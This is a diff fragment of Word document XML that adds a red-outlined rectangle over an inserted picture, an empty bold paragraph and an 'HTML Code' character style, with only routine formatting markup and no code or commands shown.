+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="768E15FF" wp14:editId="428F1143">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>3810</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>3249295</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1473200" cy="361950"/>
+                <wp:effectExtent l="0" t="0" r="12700" b="19050"/>
+                <wp:wrapNone/>
+                <wp:docPr id="2077713152" name="Rectangle 5"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1473200" cy="361950"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:solidFill>
+                            <a:srgbClr val="FF0000"/>
+                          </a:solidFill>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="2">
+                          <a:schemeClr val="accent1">
+                            <a:shade val="15000"/>
+                          </a:schemeClr>
+                        </a:lnRef>
+                        <a:fillRef idx="1">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="lt1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="72E721BC" id="Rectangle 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:.3pt;margin-top:255.85pt;width:116pt;height:28.5pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" o:gfxdata="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" filled="f" strokecolor="red" strokeweight="1pt"/>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="061F5FA8" wp14:editId="7ADA52AB">
+            <wp:extent cx="5865495" cy="3644900"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
+            <wp:docPr id="620565380" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="620565380" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5865495" cy="3644900"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2854,6 +3383,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -2957,6 +3487,19 @@
       <w:i/>
       <w:iCs/>
       <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="HTMLCode">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00FD278B"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
 </w:styles>
